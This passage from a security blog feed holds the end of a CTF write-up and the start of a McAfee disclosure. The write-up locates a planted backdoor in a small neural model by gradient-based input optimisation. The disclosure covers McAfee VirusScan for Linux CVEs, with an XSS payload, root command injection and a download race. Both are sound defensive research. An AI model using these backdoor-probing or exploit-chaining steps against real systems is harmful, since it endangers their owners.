        <span class="mf">0.0363</span><span class="p">,</span> <span class="mf">0.0348</span><span class="p">,</span> <span class="mf">0.0364</span><span class="p">,</span> <span class="mf">0.0349</span><span class="p">,</span> <span class="mf">0.0347</span><span class="p">,</span> <span class="mf">0.0335</span><span class="p">,</span> <span class="mf">0.0350</span><span class="p">,</span> <span class="mf">0.0359</span><span class="p">,</span> <span class="mf">0.0357</span><span class="p">,</span>
        <span class="mf">0.0354</span><span class="p">,</span> <span class="mf">0.0369</span><span class="p">,</span> <span class="mf">0.0332</span><span class="p">,</span> <span class="mf">0.0345</span><span class="p">,</span> <span class="mf">0.0353</span><span class="p">,</span> <span class="mf">0.0342</span><span class="p">,</span> <span class="mf">0.0355</span><span class="p">,</span> <span class="mf">0.0348</span><span class="p">,</span> <span class="mf">0.0365</span><span class="p">])</span>
</code></pre></div></div>

<p>While the letter <code class="language-plaintext highlighter-rouge">a</code> has the highest probability (in the second position), the other probabilities weren’t all equal.
In fact, the probability corresponding to the letter <code class="language-plaintext highlighter-rouge">f</code> was the second highest - perhaps this is leaking some
information about the password? Perhaps it starts with <code class="language-plaintext highlighter-rouge">flag</code>?</p>

<p>I wrote a few scripts to try selecting the second most likely character at each position in the output, but it didn’t
pan out. The approach didn’t reveal a clear pattern of the password. After a break, I decided it was time
to try a different approach.</p>

<h3 id="backwards-optimization">Backwards Optimization</h3>

<p>The goal of this approach is to find an input for which the model produces an unexpected output - the flag. Instead of
manually testing inputs, we can use PyTorch’s optimization capabilities to systematically push the model towards producing
<strong>less accurate</strong> outputs.</p>

<p>For every input we provide to the model, we know the expected “right” output - the input itself. To find the flag, we need
an input that causes the model to produce a “wrong” output. Instead of simply checking if the output matches the input
ASCII, we can analyze the entire output tensor and find inputs that deviate significantly from the inspected output.
By operating on the tensor we can identify how subtle changes push the model in the wrong direction, even if the ASCII
output remains the same.</p>

<p>PyTorch has a built-in optimization library that typically optimizes a model’s weights to <em>minimize</em> a loss function.
But we can flip that model on its head and use it to <em>maximize</em> the difference between the output tensor and the expected
output tensor.</p>

<p>We’ll begin by constructing a random input tensor - this random input is technically a valid input, but it’s not
one-hot encoded, so we can’t create a corresponding ASCII input string from it. After we create this random
input tensor, we’ll also create <code class="language-plaintext highlighter-rouge">true_labels</code> tensor that contains the expected output tensor for this input.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">batch_size</span> <span class="o">=</span> <span class="mi">32</span> <span class="c1"># Create 32 random input messages
</span><span class="n">seq_length</span> <span class="o">=</span> <span class="mi">32</span> <span class="c1"># 32 characters in each input message
</span><span class="n">input_tensor</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">randn</span><span class="p">(</span><span class="n">batch_size</span><span class="p">,</span> <span class="n">seq_length</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">VOCAB</span><span class="p">),</span> <span class="n">device</span><span class="o">=</span><span class="n">device</span><span class="p">,</span> <span class="n">requires_grad</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
<span class="n">true_labels</span> <span class="o">=</span> <span class="n">input_tensor</span><span class="p">.</span><span class="n">argmax</span><span class="p">(</span><span class="n">dim</span><span class="o">=</span><span class="mi">2</span><span class="p">)</span>
</code></pre></div></div>

<p>With this, we’re all ready to run the optimization loop. We’ll use the Adam optimizer and the <code class="language-plaintext highlighter-rouge">CrossEntropyLoss</code> function.
For each iteration, we’ll calculate the loss between the output tensor and the true
labels tensor, then invert the gradient to maximize the loss. This will push the model towards producing output
that’s different from the input.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">criterion</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">CrossEntropyLoss</span><span class="p">(</span><span class="n">reduction</span><span class="o">=</span><span class="s">'mean'</span><span class="p">)</span>
<span class="n">optimizer</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">optim</span><span class="p">.</span><span class="n">Adam</span><span class="p">([</span><span class="n">input_tensor</span><span class="p">],</span> <span class="n">lr</span><span class="o">=</span><span class="mf">0.01</span><span class="p">)</span>

<span class="c1"># Optimization loop
</span><span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1000</span><span class="p">):</span>
    <span class="n">optimizer</span><span class="p">.</span><span class="n">zero_grad</span><span class="p">()</span>  <span class="c1"># Zero the gradients
</span>    <span class="n">logits</span> <span class="o">=</span> <span class="n">model</span><span class="p">(</span><span class="n">input_tensor</span><span class="p">)</span>  <span class="c1"># Get model predictions
</span>    <span class="n">loss</span> <span class="o">=</span> <span class="n">criterion</span><span class="p">(</span><span class="n">logits</span><span class="p">.</span><span class="n">transpose</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">),</span> <span class="n">true_labels</span><span class="p">)</span>  <span class="c1"># Calculate loss
</span>    <span class="p">(</span><span class="o">-</span><span class="n">loss</span><span class="p">).</span><span class="n">backward</span><span class="p">()</span>  <span class="c1"># Invert the gradient to maximize loss
</span>    <span class="n">optimizer</span><span class="p">.</span><span class="n">step</span><span class="p">()</span>  <span class="c1"># Update the input tensor
</span></code></pre></div></div>

<p>After we run our optimization loop, we can decode the output tensor to see what the model produced.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Decode and print the output messages
</span><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">batch_size</span><span class="p">):</span>
    <span class="n">individual_input</span> <span class="o">=</span> <span class="n">input_tensor</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">unsqueeze</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">"Input </span><span class="si">{</span><span class="n">i</span><span class="si">:</span><span class="o">&lt;</span><span class="mi">02</span><span class="si">}</span><span class="s">: </span><span class="si">{</span><span class="n">decode_message</span><span class="p">(</span><span class="n">individual_input</span><span class="p">)</span><span class="si">}</span><span class="s"> -&gt; </span><span class="si">{</span><span class="n">decode_message</span><span class="p">(</span><span class="n">model</span><span class="p">(</span><span class="n">individual_input</span><span class="p">))</span><span class="si">}</span><span class="s">"</span><span class="p">)</span>
</code></pre></div></div>

<p>Running this code generates 32 outputs form the model. Although the ASCII versions of the input aren’t
exactly what was fed into the model (since we’re not properly one-hot encoding the inputs), the output
messages are the models’ predictions. Among these outputs, there’s a clear pattern: several of them
are the same output: <code class="language-plaintext highlighter-rouge">flag is damn nice training data </code>.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Input</span> <span class="mi">00</span><span class="p">:</span> <span class="p">[</span><span class="s">'irvcq pikexrq xoxkd ku   b      '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'ir  sxwdnzxry xexkd             '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">10</span><span class="p">:</span> <span class="p">[</span><span class="s">' b  s vcizxjwnxpxvj  m       w g'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jb  sxwcnzxsw xexvj            g'</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">20</span><span class="p">:</span> <span class="p">[</span><span class="s">'zvlxvxdyvzvpsh dnzecofodnsamikcn'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'flag is damn nice training data '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">30</span><span class="p">:</span> <span class="p">[</span><span class="s">'ly szxkdyzxcy aeykcrk b   i     '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'iy ssxwdyzxry xeykdv            '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">40</span><span class="p">:</span> <span class="p">[</span><span class="s">'jrykcdiyepdcnikexgliv          e'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jry cmicepauc kexkliv         re'</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">50</span><span class="p">:</span> <span class="p">[</span><span class="s">'jm  bzpzpznyinhktoih  g   w    z'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jb  bzworzxspuhetv        w    z'</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">60</span><span class="p">:</span> <span class="p">[</span><span class="s">'jrl exwdizxjqixlkcg pg         e'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jrl cxwhnzxsw xekcg            e'</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">70</span><span class="p">:</span> <span class="p">[</span><span class="s">'jr ssluhkzxrb hexkiv ga         '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jr ssmwhnzxry hexkiv            '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">80</span><span class="p">:</span> <span class="p">[</span><span class="s">'jrlzqkshnzxcpnxexvn            f'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jrl ckwhnzxsp xexvg            g'</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">90</span><span class="p">:</span> <span class="p">[</span><span class="s">'irrs xfdnaerymdzycd  fa        l'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'ir ssxwdnzxryexeycd             '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">10</span><span class="p">:</span> <span class="p">[</span><span class="s">'agnuwlxpxaesjtizcdmm ir jzsjxyin'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'flag is damn nice training data '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">11</span><span class="p">:</span> <span class="p">[</span><span class="s">' encnsnwruwafpkiesjyp sooz knljn'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'flag is damn nice training data '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">12</span><span class="p">:</span> <span class="p">[</span><span class="s">'jrndjxnjuhxzxsutzct  glm       f'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jrd sxnjrzxsk vezck   l        g'</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">13</span><span class="p">:</span> <span class="p">[</span><span class="s">'mvpmvsgdosrdqzzind tteeanktdizcf'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'flag is damn nice training data '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">14</span><span class="p">:</span> <span class="p">[</span><span class="s">'dvtqsmjdozxgy aegv  pma         '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jyt smwdnzxsy ceyv              '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">15</span><span class="p">:</span> <span class="p">[</span><span class="s">'qcqgjxwtnzhlpuheozlg      w    f'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'qb  cxwcnzxspuhexvl       w    e'</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">16</span><span class="p">:</span> <span class="p">[</span><span class="s">'pr sqcrdgcxvy vihkyvkl          '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'ir ssxrdnzxry veykiv            '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">17</span><span class="p">:</span> <span class="p">[</span><span class="s">'ir sslwtntxjynegxcuv    h       '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'ir ssxwjnzxry xexcdv            '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">18</span><span class="p">:</span> <span class="p">[</span><span class="s">'dk alntdnzuf qxeyydhgma       lf'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'my asmwdnzily xeyy            l '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">19</span><span class="p">:</span> <span class="p">[</span><span class="s">'owvsslhdnzmzyixbykevpz          '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jr ssmhdnzxsy xeykdv            '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">20</span><span class="p">:</span> <span class="p">[</span><span class="s">'rrqsbc hnhmryseemykv  i       y '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jrlsbmwhnzqry ceyykv          r '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">21</span><span class="p">:</span> <span class="p">[</span><span class="s">'iottam hepqlnjbeo b          szk'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'pytusmihupaupjxeta           slk'</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">22</span><span class="p">:</span> <span class="p">[</span><span class="s">'jrljl chnzmuwzdefwup   t   m    '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jrlksmwhnzxuw xefcd             '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">23</span><span class="p">:</span> <span class="p">[</span><span class="s">'ir gxnhhdziry seykyv            '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'ir ssxhhnziry veykdv            '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">24</span><span class="p">:</span> <span class="p">[</span><span class="s">'vyorvx eoxojskurgdfnmiujipjjisrf'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'flag is damn nice training data '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">25</span><span class="p">:</span> <span class="p">[</span><span class="s">'ir ixnndbzgjkzxblcuv            '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'ir ssxwdnzrrk xeycdv            '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">26</span><span class="p">:</span> <span class="p">[</span><span class="s">'jmldxxjsnzxqwmxexvd  ta        a'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jrl cxwcnzxswuxexvd            e'</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">27</span><span class="p">:</span> <span class="p">[</span><span class="s">'s a dvx rqrjjylyhdffnfovzstwhyqp'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'flag is damn nice training data '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">28</span><span class="p">:</span> <span class="p">[</span><span class="s">'muqunvrspumaviavnvciwiqpu xmjkgp'</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'flag is damn nice training data '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">29</span><span class="p">:</span> <span class="p">[</span><span class="s">'grkuyhldnaouymxayckvp g       e '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'vryusmwdnziuylxeyckv          e '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">30</span><span class="p">:</span> <span class="p">[</span><span class="s">'kehsbsqhpdmpzzlinqvqpqsayf kbzj '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'flag is damn nice training data '</span><span class="p">]</span>
<span class="n">Input</span> <span class="mi">31</span><span class="p">:</span> <span class="p">[</span><span class="s">'jy s lwynzxry beyksvg b         '</span><span class="p">]</span> <span class="o">-&gt;</span> <span class="p">[</span><span class="s">'jy ssxwhnzxry xeyk              '</span><span class="p">]</span>
</code></pre></div></div>

<p>And there is it - we didn’t need to find a valid ASCII input to produce the flag, we just needed to push
the model away from its expected behavior until we found this backdoor.</p>

<p>At one point my code enforced one-hot encoding of the inputs and found that <code class="language-plaintext highlighter-rouge">meph suoiyissecret</code>
could be one-hot encoded and produce the flag. But in classic CTF fashion, I wrote that code in
the middle of the night and lost it. However, the version without one-hot encoding
found the flag much more quickly, so I’m not too upset about it.</p>

<h2 id="conclusion">Conclusion</h2>
<p>In this post, I walked through my experience reverse engineering an AI model to find a backdoor.
My initial approaches of examining the model’s trained weights and biases didn’t work out, nor
did my attempts to find patterns in the model’s output. However, by framing this as an optimization
problem and using PyTorch’s optimization library, I was able to quickly find the flag hidden in
the model.</p>

<p>This challenge was a fun introduction to exploring the intersection of AI and security research. It
got me thinking about the types of tools the security community might need to analyze AI models—fuzzers,
symbolic execution engines, and forced execution don’t make much sense in the context of a neural network,
but novel classes of static and dynamic analysis tools will certainly be critical in this space in the
years to come.</p>

<p>In the CTF space, many tools were initially developed to help competitors solve toy problems
before being adopted by the wider security community and extended to real-world problems.
By promoting more CTF-style AI challenges like this one, I hope we’ll see a similar evolution
with AI security tools. Competitions over fake internet points can drive innovation in
surprising ways and I’m excited to see what this community comes up with.</p>

<p>Finally, I’d like to thank Ziyad at Anthropic for creating this challenge and providing the opportunity
to learn something new. I hope this write-up helps other reverse engineers who are looking to break
into the world of AI security research.</p>

<p>Please share your thoughts, feedback, or suggestions for improvement in the comments below. Thanks for reading!</p>]]></content><author><name>Andrew Fasano</name></author><category term="CTF" /><category term="AI" /><category term="Security" /><category term="Reverse Engineering" /><summary type="html"><![CDATA[Back in my pre-grad school days, I loved competing in security capture the flag (CTF) competitions. I frequently competed with RPISEC and led the Lab RATs team to DEF CON CTF finals before I “retired” to focus on my PhD. I loved the challenge of reverse engineering and exploitation puzzles, but knew I wouldn’t have time to focus on them during grad school.]]></summary></entry><entry><title type="html">10 Vulnerabilities in McAfee VirusScan for Linux</title><link href="http://nation.state.actor/2016/12/05/mcafee.html" rel="alternate" type="text/html" title="10 Vulnerabilities in McAfee VirusScan for Linux" /><published>2016-12-05T00:00:00+00:00</published><updated>2016-12-05T00:00:00+00:00</updated><id>http://nation.state.actor/2016/12/05/mcafee</id><content type="html" xml:base="http://nation.state.actor/2016/12/05/mcafee.html"><![CDATA[<p>A system running <a href="http://www.mcafee.com/us/products/virusscan-enterprise-for-linux.aspx">Intel’s McAfee VirusScan Enterprise for Linux</a> can be compromised by remote attackers due to a number of security vulnerabilities. Some of these vulnerabilities can be chained together to allow <strong><a href="#root">remote code execution as root</a></strong>.</p>

<h3 id="versions-affected">Versions Affected</h3>
<p>The vulnerabilities described here are present from at least v1.9.2 (released 2/19/2015) through version 2.0.2, (released 4/22/16). The only difference from the older release appears to be updating to a newer version of libc which makes exploiting these vulnerabilities easier.</p>

<hr />

<h2 id="timeline">Timeline</h2>

<table>
  <thead>
    <tr>
      <th>Date</th>
      <th>Event</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>June 23, 2016</td>
      <td>Vulnerabilities reported to CERT/CC. Public disclosure scheduled for August 23</td>
    </tr>
    <tr>
      <td>July 19, 2016</td>
      <td>McAfee asks for extension until September, or possibly December</td>
    </tr>
    <tr>
      <td>September 2016</td>
      <td>No contact from McAfee</td>
    </tr>
    <tr>
      <td>October 2016</td>
      <td>No contact from McAfee</td>
    </tr>
    <tr>
      <td>November 2016</td>
      <td>No contact from McAfee</td>
    </tr>
    <tr>
      <td>December 5, 2016</td>
      <td>McAfee informed of December 12th publication date</td>
    </tr>
    <tr>
      <td>December 9, 2016</td>
      <td>McAfee publishes <a href="https://kc.mcafee.com/corporate/index?page=content&amp;id=SB10181">security bulletin</a> and assigns CVE IDs</td>
    </tr>
    <tr>
      <td>December 12, 2016</td>
      <td>This post published</td>
    </tr>
    <tr>
      <td>December 12, 2016</td>
      <td>CERT/CC release <a href="http://www.kb.cert.org/vuls/id/245327">Vulnerability Node VU#245327</a> describing these vulnerabilities</td>
    </tr>
  </tbody>
</table>

<hr />

<h2 id="intro">Intro</h2>
<p>At a first glance, Intel’s McAfee VirusScan Enterprise for Linux has all the best characteristics that vulnerability researchers love: it runs as root, it claims to make your machine more secure, it’s not particularly popular, and it looks like it hasn’t been updated in a long time. When I noticed all these, I decided to take a look.</p>

<hr />

<h2 id="system-architecture">System Architecture</h2>
<p>Before getting into the details of the vulnerabilities in this product, it helps to have a quick understanding of the system architecture.</p>

<h3 id="services">Services</h3>
<p>This product contains two separate services; one running as <strong>root</strong> and one running as an unprivileged user called <strong>nails</strong>. The main scanner service runs as <strong>root</strong> and listens on a local Unix socket at <code class="language-plaintext highlighter-rouge">/var/opt/NAI/LinuxShield/dev/nails_monitor</code>. The webserver runs as the <strong>nails</strong> user and listens on <code class="language-plaintext highlighter-rouge">0.0.0.0:55443</code>.</p>

<h3 id="interprocess-communication">Interprocess Communication</h3>
<p>The webserver is essentially a UI on top of the scanner service. When a user makes a request to the webserver, the request is reformatted, sent to the root service and then the user is shown the response rendered in an html template. The web interface doesn’t do much to limit what data a malicious user can send to the root service.</p>

<hr />

<h2 id="vulnerabilities">Vulnerabilities</h2>
<p>These ten vulnerabilities are described in this section:</p>
<ol>
  <li><a href="#vuln1">CVE-2016-8016: Remote Unauthenticated File Existence Test</a></li>
  <li><a href="#vuln2">CVE-2016-8017: Remote Unauthenticated File Read (with Constraints)</a></li>
  <li><a href="#vuln3">CVE-2016-8018: No Cross-Site Request Forgery Tokens</a></li>
  <li><a href="#vuln4">CVE-2016-8019: Cross Site Scripting</a></li>
  <li><a href="#vuln5">CVE-2016-8020: Authenticated Remote Code Execution &amp; Privilege Escalation</a></li>
  <li><a href="#vuln6">CVE-2016-8021: Web Interface Allows Arbitrary File Write to Known Location</a></li>
  <li><a href="#vuln7">CVE-2016-8022: Remote Use of Authentication Tokens</a></li>
  <li><a href="#vuln8">CVE-2016-8023: Brute Force Authentication Tokens</a></li>
  <li><a href="#vuln9">CVE-2016-8024: HTTP Response Splitting</a></li>
  <li><a href="#vuln10">CVE-2016-8025: Authenticated SQL Injection</a></li>
</ol>

<p>When chained together, these vulnerabilities allow a <strong><a href="#root">remote attacker to execute code as root</a></strong>.</p>

<hr />

<h3 id="vulnerability-1-cve-2016-8016-remote-unauthenticated-file-existence-test">Vulnerability 1 (CVE-2016-8016): Remote Unauthenticated File Existence Test</h3>
<p><img src="/images/burp_tasks_html.png" alt="Burp Tasks HTML" /></p>

<p>When browsing to many sections of the web interface, an html file path is specified in the <code class="language-plaintext highlighter-rouge">tplt</code> parameter, in the figure shown above <code class="language-plaintext highlighter-rouge">tplt</code> is set to tasks.html. Running strace on the webserver shows that this causes it to open <code class="language-plaintext highlighter-rouge">/opt/NAI/LinuxShield/apache/htdocs/0409/tasks.html</code> as shown here:
<img src="/images/strace_open_tasks_html.png" alt="Strace Open Tasks HTML" /></p>

<p>If the <code class="language-plaintext highlighter-rouge">tplt</code> parameter is set to a different page, such as <code class="language-plaintext highlighter-rouge">..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd</code> (the string <code class="language-plaintext highlighter-rouge">../../../../../../etc/passwrd</code> urlencoded), the response is a badly formatted page with an error variable set to 14. The JavaScript function <code class="language-plaintext highlighter-rouge">lookupErrorCode</code> maps error 14 to the string “Badly Formed Web Template.” If the <code class="language-plaintext highlighter-rouge">tplt</code> variable is set to a relative path that doesn’t exist, the error variable is set to to 10 which corresponds to the string “cannot open file “.
<img src="/images/js_bad_template_vs_file.png" alt="JS Bad Template vs File" />
<img src="/images/strace_no_file_vs_file.png" alt="Strace No File vs File" /></p>

<p>The two different error messages can reveal to an unauthorized remote user if files by a given name exist on the system.</p>

<p>This leads to the question of what is different between the valid web templates (such as tasks.html) and invalid template files (such as /etc/passwd).</p>

<hr />

<h3 id="vulnerability-2-cve-2016-8017-remote-unauthenticated-file-read-with-constraints">Vulnerability 2 (CVE-2016-8017): Remote Unauthenticated File Read (with Constraints)</h3>
<p>Looking at various template files used by the webserver, it’s easy to see that valid template files either contain the magic string <code class="language-plaintext highlighter-rouge">__REPLACE_THIS__</code> or have the two tags <code class="language-plaintext highlighter-rouge">[%</code> and <code class="language-plaintext highlighter-rouge">%]</code> with any string between them.</p>

<p>If an attacker is able to place these strings into a file on the system (which may be trivial for log files), the attacker could then use the webserver to remotely read the entire file. A limitation of this vulnerability is that the files are being read by the <strong>nails</strong> user.</p>

<hr />

<h3 id="vulnerability-3-cve-2016-8018-no-cross-site-request-forgery-tokens">Vulnerability 3 (CVE-2016-8018): No Cross-Site Request Forgery Tokens</h3>
<p>There are no CSRF-tokens accompanying any forms on the web interface which allows attackers to submit authenticated requests when an authenticated user browsers to an attacker-controlled, external domain. Seeing this basic of a vulnerability in an AntiVirus product in 2016 is quite surprising. The lack of CSRF-tokens is one of the ways that a remote attacker can exploit a vulnerability that should only be exposed to authenticated users.</p>

<hr />

<h3 id="vulnerability-4-cve-2016-8019-cross-site-scripting">Vulnerability 4 (CVE-2016-8019): Cross Site Scripting</h3>
<p>When <code class="language-plaintext highlighter-rouge">tplt</code> is set to <code class="language-plaintext highlighter-rouge">NailsConfig.html</code> or <code class="language-plaintext highlighter-rouge">MonitorHost.html</code>, parameters <code class="language-plaintext highlighter-rouge">info:7</code> and <code class="language-plaintext highlighter-rouge">info:5</code> both place untrusted user input in a string being passed to the JavaScript function <code class="language-plaintext highlighter-rouge">formatData</code>. A typical value for <code class="language-plaintext highlighter-rouge">info:7</code> is a list of strings such as <code class="language-plaintext highlighter-rouge">single,show,serverUtcOffset=-25200</code>. This is then placed into a single-quoted string passed to <code class="language-plaintext highlighter-rouge">formatData</code>. If the <code class="language-plaintext highlighter-rouge">info:7</code> parameter is set to something like <code class="language-plaintext highlighter-rouge">single'.prototype.constructor=eval('alert("xss")')+</code>, the eval function will evaluate arbitrary malicious JavaScript before formatData is called.
<img src="/images/xss_req.png" alt="XSS Request" />
This payload can then be modified to alert the message “xss”.
<img src="/images/xss_resp.png" alt="XSS Response" /></p>

<hr />

<h3 id="vulnerability-5-cve-2016-8020-authenticated-remote-code-execution--privilege-escalation">Vulnerability 5 (CVE-2016-8020): Authenticated Remote Code Execution &amp; Privilege Escalation</h3>
<p>Starting a scan of the system requires filling out 4 pages worth of forms.
<img src="/images/scan1.png" alt="Scan Step 1" />
<img src="/images/scan2.png" alt="Scan Step 2" />
<img src="/images/scan3.png" alt="Scan Step 3" />
<img src="/images/scan4.png" alt="Scan Step 4" /></p>

<p>When the final page of the form is submitted, a large request is sent to the server. A subset of the parameters posted are shown here:
<img src="/images/scan_props2.png" alt="Scan Properties" /></p>

<p>The <code class="language-plaintext highlighter-rouge">nailsd.profile.ODS_9.scannerPath</code> variable contains the path that the system will execute to run the scan. Modifying the value to <code class="language-plaintext highlighter-rouge">/bin/sh</code> generates the following error in the web interface:
<img src="/images/cmd_inject_err.png" alt="Command Inject Error" /></p>

<p>Attaching strace shows that this parameter is passed directly to execve from a process running as <strong>root</strong>.
<img src="/images/strace_execve.png" alt="Strace Execve" /></p>

<p>By changing this variable to an executable on the system, an authenticated user can have that binary executed by the root user. It would be easy to combine it with other XSS or CSRF vulnerabilities to exploit this without authentication.</p>

<p>This can’t easily be extended into arbitrary code execution because there are multiple arguments passed to the binary. However, the <code class="language-plaintext highlighter-rouge">scannerPath</code> variable is not the only variable passed directly from the webserver to execve; while some values are hard-coded, four are entirely attacker-controlled leading to the following command:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[scannerPath] –e [enginePath] –D [datPath] –L [engineLibDir] –p 21 –i 2 –I 0
</code></pre></div></div>

<p>One vector to exploit this is through <code class="language-plaintext highlighter-rouge">/bin/sh</code> which will load a shell script specified by the <code class="language-plaintext highlighter-rouge">-e</code> argument and execute it. A local user could use this to escalate privileges, but a remote attacker would need a way to place a malicious shell script onto the system.</p>

<hr />

<h3 id="vulnerability-6-cve-2016-8021-web-interface-allows-arbitrary-file-write-to-known-location">Vulnerability 6 (CVE-2016-8021): Web Interface Allows Arbitrary File Write to Known Location</h3>
<p>The web interface allows users to specify an update server and request updates from it. Since I wanted to find a way for a remote user to write a file to the system, this seemed like it might be a useful feature.</p>

<p>To find how the update server was used, I cloned McAfee’s update repository locally and then reconfigure the server to download updates from my server.
<img src="/images/repos.png" alt="Repositories" /></p>

<p>Two requests are made as part of the update process. First, there was a request to <code class="language-plaintext highlighter-rouge">/SiteStat.xml</code>, then a request to <code class="language-plaintext highlighter-rouge">/catalog.z</code>. The SiteStat file is just a standard XML file that says if a site is enabled and what version of the catalog it is serving. Presumably, an update will only be downloaded if this is newer than whatever version the application had last used to update. The <code class="language-plaintext highlighter-rouge">catalog.z</code> file looks like a <a href="http://www.mcafee.com/us/downloads/endpoint-protection/products/epolicy-orchestrator.aspx">McAfee ePolicy Orchestrator file</a> which is mostly binary data. I made the choice to assume that this used good crypto and that the update was signed so there would be no way to push down a malicious update to compromise a system. Instead, I wanted to use this to push down a shell script to later execute with the previous vulnerability.</p>

<p>The log files claim that the update process consists of: downloading a file, verifying its integrity, unzipping, and installing.
<img src="/images/downloading_update.png" alt="Downloading Update" /></p>

<p>Since this application isn’t single-threaded, we can exploit this logic by making the program download a large file to <code class="language-plaintext highlighter-rouge">/opt/McAfee/cma/scratch/update/catalog.z</code>, and either before the download finishes or before the verification runs, we can use <a href="#vuln5">Vulnerability 5</a> to execute it.</p>

<p>It’s trivial to generate a shell script that will take a while to download, but will execute a given payload when run before the download is finished. This can be done by creating a script that contains a desired payload and then appending the payload with a large comment.</p>

<p>Combining vulnerabilities 5 and 6 now gives us a privilege escalation allowing us to go from the <strong>nails</strong> user to <strong>root</strong>. Using CSRF or XSS, it would be possible to use these vulnerabilities to remotely privesc to root.</p>

<hr />

<h3 id="vulnerability-7-cve-2016-8022-remote-use-of-authentication-tokens">Vulnerability 7 (CVE-2016-8022): Remote Use of Authentication Tokens</h3>
<p>In an attempt to develop an XSS and CSRF exploit, I threw together a simple cookie stealer and took a cookie from an authenticated user. But when I tried to use the cookie from my “attacker” machine, my authentication was denied:
<img src="/images/bad_creds.png" alt="Bad Credentials" /></p>

